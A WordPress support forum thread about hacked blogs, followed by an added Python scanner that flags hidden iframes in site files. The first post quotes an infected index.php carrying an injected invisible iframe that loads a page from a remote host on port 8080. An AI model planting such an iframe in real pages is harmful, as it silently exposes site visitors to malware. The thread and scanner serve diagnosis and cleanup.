Website hack (4 posts)

  1. nazcar
    Member
    Posted 2 years ago #

    Two of my WordPress self-hosted blogs were hacked. The index.php file was altered. Did anyone experience this?

    Original:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-
    <iframe src="http://u1w.in:8080/ts/in.cgi?pepsi112" width=125 height=125 style="visibility: hidden"></iframe>

    My blogs are working fine now.
    How to increase the security so it won't be altered/hacked again?
    My previous permission was 644 then I changed it now to 444.

  2. Samuel B
    moderator
    Posted 2 years ago #

  3. nazcar
    Member
    Posted 2 years ago #

    Thanks. The reason I am not upgrading is because my plugins are not updated or may not be supported in the latest WP update. I guess I'll sacrifice those plugins for now because of these attacks.

  4. UseShots
    Member
    Posted 2 years ago #

    Hardening WordPress is a good thing. Unfortunately, it won't help in this particular case.

    This iframe is injected using FTP credentials stolen from your local computer.

    So make sure to scan your computer for malware.
    Once you are sure your computer is clean, change FTP passwords.
    And don't save passwords inside your FTP program if you don't want them to be stolen again.

    Here you can find more information about this attack:
    http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/
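
A check for the kind of injected line shown in the first post, as an added example that is not part of the original thread: a Python scanner that walks a site directory and reports iframes styled to be invisible. The hiding heuristics, the file extensions and the sample host are assumptions of this example.

```python
import os
import re
import sys

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)  # group 1: attribute string
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Heuristics (assumed for this example) for attributes that hide a frame.
HIDING_RES = {
    "visibility:hidden": re.compile(r"visibility\s*:\s*hidden", re.I),
    "display:none": re.compile(r"display\s*:\s*none", re.I),
    "0/1px size": re.compile(r"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["'\s]""", re.I),
}
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl")
# Constructed sample modelled on the injected line in the post; the host is a placeholder.
SAMPLE = ("<?php\nrequire('./wp-blog-header.php');\n?>\n"
          '<iframe src="http://bad.example.invalid:8080/in.cgi?x" width=125 '
          'height=125 style="visibility: hidden"></iframe>\n')


def find_hidden_iframes(text):
    """Return (line_number, src, reasons) for each iframe styled to be invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1) + " "  # trailing space lets the size pattern match a final attribute
        reasons = [name for name, rx in HIDING_RES.items() if rx.search(attrs)]
        if reasons:
            src = SRC_RE.search(attrs)
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else "", reasons))
    return hits


def scan_tree(root):
    """Walk a site directory and map each affected file to its hidden iframes."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
    for root in sys.argv[1:]:
        print(scan_tree(root))
```

Run it with the site's document root as the argument. A hit is a lead to review by hand, since some legitimate embeds also use hidden frames.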
